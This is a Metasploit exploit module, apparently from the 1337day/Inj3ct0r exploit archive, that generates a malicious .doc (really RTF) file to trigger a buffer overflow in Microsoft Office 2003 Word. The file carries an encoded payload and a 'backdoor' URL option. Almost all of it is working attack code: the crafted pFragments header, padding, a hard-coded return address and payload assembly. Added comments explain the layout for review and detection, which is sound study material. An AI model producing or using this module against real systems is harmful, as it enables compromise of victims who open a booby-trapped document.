
Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
# Author : KedAns-Dz
# E-mail : [email protected] ([email protected]) | [email protected] | [email protected]
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns 
# platform : windows ( local BOF via MSF)
# Type : local exploit / Buffer Overflow / Metasploit
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
# | ------------------------------------------------- < |
###

##
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
##

require 'msf/core'

# Metasploit file-format module. It does not talk to any host: the only
# side effect is the file written by file_create in #exploit (FILEFORMAT
# mixin). The class inherits Msf::Exploit::Remote, but none of the Remote
# mixin's networking is used here.
#
# Detection note: although the default FILENAME ends in .doc, the bytes
# written are RTF text (the document starts with "{\rt" once `file` is
# decoded), so a check that trusts the extension alone will misclassify it.
class Metasploit3 < Msf::Exploit::Remote
     Rank = GoodRanking

    include Msf::Exploit::FILEFORMAT

    # Registers module metadata and the two user options (FILENAME, URLBD).
    #
    # @param info [Hash] extra module info merged by update_info
    def initialize(info = {})
        super(update_info(info,
           'Name'     => 'Microsoft Office 2003 (.doc) Command Exec and local BOF',
           'Description' => %q{
             This module exploits a buffer overflow in Microsoft Office 2003
             and Command Exec With .doc file .
			},
           'License'        => MSF_LICENSE,
           'Author'         =>
              [
               'b33f',
               'g11tch',
               'KedAns-Dz <ked-h[at]hotmail.com>' # MSF module
              ],
           'Version'        => '1.0',
           'References'     =>
               [
            	# NOTE(review): the host part has no TLD (exploit-db, not
            	# exploit-db.com); confirm the intended reference URL.
            	[ 'URL', 'http://exploit-db/exploits/18334' ],
               ],
           'DefaultOptions' =>
               {
                'EXITFUNC' => 'process',
               },
           'Payload'        =>
                {
                # Size limit the framework applies when generating the payload.
                'Space'      => 1024,
                # A single quote is excluded from the encoded payload bytes.
                'BadChars'    => "'",
                # Payload is forced through the alphanumeric (mixed-case)
                # encoder; its decoder stub expects ESI to point at the buffer.
                'EncoderType'  => Msf::Encoder::Type::AlphanumMixed,
                'EncoderOptions' =>
                   {
                    'BufferRegister' => 'ESI',
                   }
                },
           'Platform'       => 'win',
           'Targets'        =>
               [
             # NOTE(review): 'Ret' is empty and #exploit never reads
             # target['Ret']; the address text is hard-coded in `buf` instead.
             [ 'Microsoft Office 2003 - MSWord (.doc Heap Spray)', { 'Ret' => '' } ],
               ],
            'DisclosureDate' => 'JAN 08 2012',
            'DefaultTarget'  => 0))

        register_options(
           [
            OptString.new('FILENAME', [ true, 'The file name.',  'msf.doc']),
            # Operator-supplied string; it is transformed by Rex::Text.to_unescape
            # in #exploit and appended to the document after the payload.
            OptString.new('URLBD', [ true, 'URL From the Backdoor.',  'http://']),
           ], self.class)
    end

    # Builds the document bytes and writes them to FILENAME via file_create.
    #
    # Layout, in order: `file` (RTF shape header), `buf` (padding, hard-coded
    # address text, random filler, "90" text, the encoded payload), then the
    # to_unescape'd URLBD, a NUL, and closing braces.
    def exploit
        # Encode the url.
        url = Rex::Text.to_unescape(datastore['URLBD'])
		
    # Header File
    # Decoded, these bytes are RTF text:
    #   {\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0
    #   \shpbxcolumn\shpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}
    #   {\*\*\*\{\sv{\*...\*R*\*...\*}9;2;ffffffffff
    # i.e. a shape property named pFragments whose \sv value begins with
    # "9;2;ffffffffff" and continues with the text built in `buf` below.
    # The group is not closed here; the trailing braces are appended at the end.
   file =
   "\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+
   "\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+
   "\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+
   "\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+
   "\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+
   "\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+
   "\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+
   "\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+
   "\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
   "\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
   "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+
   "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
   "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+
   "\x66\x66\x66\x66\x66\x66\x66\x66"
	  # Buffer Overflow 
	  # Everything up to payload.encoded is plain ASCII text, mostly hex digits
	  # continuing the \sv value started in `file`.
	    buf = "\x23" * 501                  # 501 '#' characters
       buf << "\x30\x35"                   # "05"
       buf << "\x30" * 40                  # 40 '0' characters
       # ASCII text "66433230"; the author labels it as a CALL ESP address in
       # WINWORD.exe. Hard-coded rather than taken from the target's 'Ret'.
       buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP - WINWORD.exe
       buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2 # "0000807c" twice
       buf << rand_text_alpha(42)          # 42 random letters (filler)
       buf << "\x39\x30" * 18              # "90" repeated 18 times (hex text of 0x90)
       # Encoded payload appended verbatim -- no hex-text conversion is applied,
       # which is why #initialize restricts it to the alphanumeric encoder.
       buf << payload.encoded
		
      # Create the doc
      # `doc` and `file` reference the same String object, so the << calls
      # below also mutate `file`. Harmless here since `file` is not reused.
        doc = file
        doc << buf
        doc << url
        doc << "\x00"
        doc << "{}}}}}}"
        doc << "\x0d\x0a"
        doc << "}"

		print_status("Creating '#{datastore['FILENAME']}' file...")

		# FILEFORMAT mixin: writes `doc` to the path/name given by FILENAME.
		file_create(doc)
	end

end

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy 
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================


